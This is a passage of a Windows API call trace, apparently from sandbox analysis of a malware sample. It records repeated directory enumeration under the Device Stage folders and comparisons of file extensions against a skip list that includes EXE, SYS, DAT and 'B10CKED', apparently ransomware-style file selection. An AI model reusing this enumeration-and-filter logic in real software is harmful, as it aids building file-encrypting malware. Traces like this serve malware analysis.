Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | 
out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE 
STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.186] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.186] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.186] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0108.186] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.186] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0108.186] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.186] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.187] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.187] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: 
lpFindFileData=0x12ee90) returned 1 [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.228] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.228] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 
[0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.398] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.398] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.399] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", 